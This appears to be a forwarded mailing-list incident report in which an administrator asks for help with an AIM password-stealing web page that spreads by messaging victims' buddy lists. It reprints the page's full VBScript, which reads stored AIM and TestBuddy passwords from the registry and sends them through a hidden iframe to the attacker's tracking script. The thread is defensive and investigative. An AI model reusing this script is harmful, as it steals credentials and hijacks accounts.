[Fwd: Re: AIM Password theft]

Hi, can anyone shed some light on this for me? If this is new, its going to spread like wildfire. AOL or incidents lists have yet to reply.... it appears to be a legitimate threat as I have at least one user "infected" already.. Thank you..

-Mark Coleman

--------------

Hi, please find attached the vbs code that appears to be running when visitors hit www.haxr.org.

This reportedly pulls username/password from registry of AIM accounts, then something elsewhere gets buddy lists through this password theft and sends links to them via AOL to start the process again.

We've had at least one "infection" if you want to call it that, and a user's AIM account was hijacked and this link sent to all users in his buddy list which then propelled the "infection" as they click the link to www.haxr.org.

Does anyone have any information about this issue? Any help on this would be greatly appreciated. Still chasing it down..

-Mark Coleman

Mark Coleman wrote:

I just started investigating a report that appears to have merit of a username/password theft of AIM accounts.

Users are being directed to a web page located at www.haxr.org where the source appears to run a javascript program that is proportedly stealing AIM usernames/passwords/buddy lists.

Does anyone have any information related to www. haxr.org or the technique being used?
Please be careful when visiting the page, it pulls script off of a yahoo site.

I am finding nothing in any of the initial searches that I am doing.

Any help/insight would be greatly appreciated.

-Mark Coleman

On Error Resume Next
Dim objReg
Set objReg = Createobject("WScript.Shell")
Dim tbuser, tbpw
dim user, pwvalue, pwout, pwold
window.resizeTo 0,0
window.moveTo 5000,5000
tbuser = objReg.regread ("HKEY_CURRENT_USER\Software\America
Online\TestBuddy\ScreenName")
tbpw = replace(objReg.regread ("HKEY_CURRENT_USER\Software\America
Online\TestBuddy\" & tbuser & "\Password"), "+", ".")
user = objReg.regread ("HKEY_CURRENT_USER\Software\America Online\AOL Instant
Messenger (TM)\CurrentVersion\Login\Screen Name")
pwvalue = replace(objReg.regread ("HKEY_CURRENT_USER\Software\America
Online\AOL Instant Messenger (TM)\CurrentVersion\Users\" & user &
"\Login\Password1"), "+", ".")
pwold = replace(objReg.regread ("HKEY_CURRENT_USER\Software\America Online\AOL
Instant Messenger (TM)\CurrentVersion\Users\" & Lcase(Replace(user, " ","")) &
"\Login\Password"), "+", ".")
pwout = pwvalue
document.write("<center><iframe src='tracking.php?name=" & user & "&hash=" &
pwout & "&old=" & pwold & "&tbname=" & tbuser & "&tbpassword=" & tbpw & "'
width='0' height='0' onLoad='javascript:window.close();'></center>")
--- Begin Message --- Hi, please find attached the vbs code that appears to be running when visitors hit www.haxr.org.

Mark Coleman wrote:

[...]

--- End Message ---